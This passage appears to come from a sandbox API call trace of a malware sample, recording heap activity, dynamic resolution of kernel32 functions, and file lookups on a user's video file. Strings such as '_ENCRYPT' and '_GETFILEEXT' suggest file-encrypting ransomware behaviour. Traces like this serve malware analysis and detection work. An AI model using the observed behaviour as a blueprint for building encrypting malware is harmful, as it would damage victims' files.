lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba4f8 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0197.292] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=90, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 90 [0197.292] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb4) returned 0x8fabc0 [0197.293] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=90, lpWideCharStr=0x8fabc0, cchWideChar=90 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv") returned 90 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd618 | out: hHeap=0x8a0000) returned 1 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc0) returned 0x9c3540 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8fabc0 | out: hHeap=0x8a0000) returned 1 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd618 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9c0 | out: hHeap=0x8a0000) returned 1 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9c0 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.293] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.293] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd810 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9f70 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7c8 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba078 [0197.294] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a30 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0197.294] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a30 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7c8 | out: hHeap=0x8a0000) returned 1 [0197.295] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1d30 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de218 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd828 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd840 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd978 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd870 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd600 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2e8 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fa0 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd528 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda20 | out: hHeap=0x8a0000) returned 1 [0197.295] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9d8 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8b8 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8a0 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0c88 | out: hHeap=0x8a0000) returned 1 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1ad0 | out: hHeap=0x8a0000) returned 1 [0197.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de218 [0197.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8a0 [0197.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1ad0 [0197.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0197.296] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18c0 [0197.296] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.297] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0197.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0197.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0197.297] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8a8 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd7f8 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fd0 [0197.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd900 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdac8 [0197.297] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.297] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8d0 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba570 [0197.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda80 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd8e8 [0197.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba228 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1af0 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0197.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1af0 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd630 [0197.298] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.298] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.298] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de970 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19d0 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.299] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0197.299] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd378 [0197.299] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CloseHandle", cchWideChar=12, lpMultiByteStr=0x9bd378, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CloseHandle", lpUsedDefaultChar=0x0) returned 12 [0197.299] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.300] GetProcAddress (hModule=0x75990000, lpProcName="CloseHandle") returned 0x759a1410 [0197.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8dea38 [0197.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.300] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8dea38 | out: hHeap=0x8a0000) returned 1 [0197.300] CloseHandle (hObject=0x158) returned 1 [0197.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0197.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e83b8 [0197.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e19d0 [0197.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bdae0 [0197.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0197.300] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda50 [0197.300] FreeLibrary (hLibModule=0x75990000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de970 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd630 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fd0 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd7f8 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdac8 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd900 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba570 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda80 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba228 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8a8 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bdae0 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19d0 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e83b8 | out: hHeap=0x8a0000) returned 1 [0197.301] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0197.305] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0197.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="no", cchCount1=2, lpString2="no", cchCount2=2) returned 2 [0197.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0197.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba2a0 | out: hHeap=0x8a0000) returned 1 [0197.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0197.305] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0197.305] PeekMessageW (in: lpMsg=0x87f81c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f81c) returned 0 [0197.305] CharUpperBuffW (in: lpsz="_ENCRYPT", cchLength=0x8 | out: lpsz="_ENCRYPT") returned 0x8 [0197.305] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.305] CharUpperBuffW (in: lpsz="_GETFILEEXT", cchLength=0xb | out: lpsz="_GETFILEEXT") returned 0xb [0197.305] PeekMessageW (in: lpMsg=0x87f094, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f094) returned 0 [0197.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="v", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.305] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="kv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0197.306] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".mkv", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0197.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", lpFindFileData=0x87eec0 | out: lpFindFileData=0x87eec0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xf297f770, ftCreationTime.dwHighDateTime=0x1d5e569, ftLastAccessTime.dwLowDateTime=0x9fa1c510, ftLastAccessTime.dwHighDateTime=0x1d5e239, ftLastWriteTime.dwLowDateTime=0x9fa1c510, ftLastWriteTime.dwHighDateTime=0x1d5e239, nFileSizeHigh=0x0, nFileSizeLow=0x7678, dwReserved0=0x0, dwReserved1=0x8a7560, cFileName="jyvwvjYdk6QKt4.mkv", cAlternateFileName="JYVWVJ~1.MKV")) returned 0x90add8 [0197.306] FindClose (in: hFindFile=0x90add8 | out: hFindFile=0x90add8) returned 1 [0197.306] PeekMessageW (in: lpMsg=0x87f5c4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f5c4) returned 0 [0197.306] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\FoKJzmJBM6_F0eozYZo\\e1Y-mgGtzCZzg\\jyvwvjYdk6QKt4.mkv", 